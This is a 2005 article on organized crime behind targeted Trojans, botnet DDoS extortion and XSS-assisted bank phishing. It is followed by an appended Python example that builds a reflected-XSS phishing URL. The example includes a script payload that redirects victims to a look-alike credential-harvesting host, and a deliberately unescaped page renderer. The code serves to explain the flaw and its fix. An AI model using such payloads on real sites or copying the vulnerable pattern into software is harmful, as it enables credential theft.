Increasing Organized Crime Involvement Means More Targeted Attacks
By Paul Stamp with Jonathan Penn, Merv Adrian and Benjamin Gray
Organized crime gangs are increasingly behind targeted cybercrime, and they are using more sophisticated methods.
October 12, 2005 — CSO —
Attacks on computer security infrastructure used to be little more than indiscriminate acts of vandalism perpetrated by hackers who desired bragging rights more than anything. But the perpetrators of attacks and their motivations have changed. Security intelligence experts have detected the tell-tale signs of organized crime gangs and government espionage in attacks, and a hacker community much more motivated by financial gain than personal or political fulfillment. The resulting increase in attack sophistication means that companies must adopt a more vigilant and correspondingly sophisticated approach to defending their environments.
New Genres of Attack Indicate Organized Criminal Involvement
In recent times, security attacks have become far more sophisticated in nature, targeted at particular organizations and user groups, and designed for financial gain. Three particular types of attack are becoming more common:
- Targeted Trojans. Targeted Trojan attacks have much the same effect as conventional Trojans, often opening back doors and covert channels for the theft of information. What makes targeted Trojans different, though, is that they are made specifically for use against a particular organization or user group. Moreover, because they are not widespread, they slip under the radar of most antivirus (AV) vendors looking to develop new signatures and are seldom detected by AV software. For example, the UK National Infrastructure Security Coordination Centre (NISCC) reported a sophisticated targeted Trojan attack on the UK Ministry of Defence and other government agencies. In another case, the Grams e-gold attack sent an email to users, purporting to be from the IT organization, prompting them to run a script to update configuration settings. In reality, the script connected to the Internet and then downloaded and executed a program that monitored the user's Web browsing. If the user then accessed an account at the financial Web site www.e-gold.com, the Trojan opened a hidden Web session in the background and drained the user's account.
- Zombie bot attacks. In the last couple of years, there has been an explosion in the number of attacks that start by infecting legions of Internet-connected home computers with specific malware. These networks of infected machines are often known as "zombie bot networks" or "botnets"; hackers then take control of these machines and use them to send spam or phishing messages, or to launch distributed denial of service (DDoS) attacks on Web sites. Researchers at messaging security vendor CipherTrust found, on average, more than 170,000 newly infected zombie machines every day during May 2005. Another worrying aspect of zombie bot DDoS attacks is that they often go hand-in-hand with an attempt to extort money from the victim organization. Typically, the criminal sends the victim a demand for money, threatening to launch a DDoS attack against the victim's Web site otherwise. However, in contrast to a virus or worm that hits globally and gets extensive publicity, a DDoS extortion attack hits one organization, which generally keeps very quiet about it. [1] In the UK, the National Hi-Tech Crime Unit (NHTCU) reported that more than 50 UK companies had been hit by DDoS extortion attacks in 2004, and last summer they arrested members of a Russian crime gang who had netted £1.3 million in 90 days via this type of extortion.
- Sophisticated phishing and message-based fraud attacks. Email- and IM-based phishing attacks are getting more sophisticated and more targeted, sometimes using multiple vectors of attack to obtain information from system users. For example, one recent phishing attack appeared to direct users toward the search site Ask Jeeves, but instead directed them to a spoofed site that downloaded a keylogger onto their machine. [2] The keylogger then waited until the user accessed an online banking application and forwarded the keystrokes to a malicious Web site. Also, last November, phishers used cross-site scripting vulnerabilities in SunTrust Banks' and Citibank Australia's Web sites to make the target URLs in phishing emails appear legitimate: because the link really did point at the bank's own domain, a user (or a filter) checking only the host name saw nothing wrong.
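The cross-site scripting trick described above, as an added illustration that is not from the original article and not the code of any bank named in it. It assumes a hypothetical bank site at bank.example whose search page echoes the q parameter into its HTML; the vulnerable and hardened renderers, the attacker payload and the look-alike host bank-secure-login.example are all constructed for the example.

```python
"""Added example: how a reflected XSS flaw on a bank's own domain lets a
phishing link carry the bank's genuine host name.

Everything here is hypothetical: bank.example, its search page, the payload
and the look-alike host are constructed for illustration.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

BANK_HOST = "bank.example"  # hypothetical legitimate bank host


def render_search_vulnerable(query: str) -> str:
    """Echoes the untrusted query into the page unescaped (reflected XSS)."""
    return f"<h1>Results for {query}</h1>"


def render_search_hardened(query: str) -> str:
    """Escapes the untrusted query so the browser renders it as text, not markup."""
    return f"<h1>Results for {escape(query, quote=True)}</h1>"


def handle_request(url: str, renderer) -> str:
    """Simulates the bank's server: parse the request URL, render the search page."""
    parts = urlsplit(url)
    q = parse_qs(parts.query).get("q", [""])[0]  # parse_qs percent-decodes
    return renderer(q)


def build_phishing_url(payload_html: str) -> str:
    """Attacker side: wrap the payload in a URL whose host really is the bank's."""
    return f"https://{BANK_HOST}/search?q={quote(payload_html, safe='')}"


def host_looks_legitimate(url: str) -> bool:
    """The only check a victim or a naive URL filter tends to make."""
    return urlsplit(url).hostname == BANK_HOST


def contains_injected_script(html: str) -> bool:
    """Did the rendered page end up with live script markup in it?"""
    return "<script" in html.lower()


# Constructed payload: script that would bounce the victim to a look-alike
# credential-harvesting page on a hypothetical attacker host.
PAYLOAD = '<script>location="https://bank-secure-login.example/"</script>'


def demo():
    """Returns (host passes the naive check, vulnerable page injected,
    hardened page injected)."""
    url = build_phishing_url(PAYLOAD)
    legit = host_looks_legitimate(url)
    vuln = contains_injected_script(handle_request(url, render_search_vulnerable))
    hard = contains_injected_script(handle_request(url, render_search_hardened))
    return legit, vuln, hard


if __name__ == "__main__":
    print(build_phishing_url(PAYLOAD))
    print(demo())  # (True, True, False)
```

The point the three results make: the phishing URL passes a host-name check (True), the vulnerable page executes the attacker's script (True), and the only real fix is on the site side, encoding untrusted output so the same URL renders harmlessly (False). Mail filters and user education that key on "does the link go to the bank?" do not catch this class of lure.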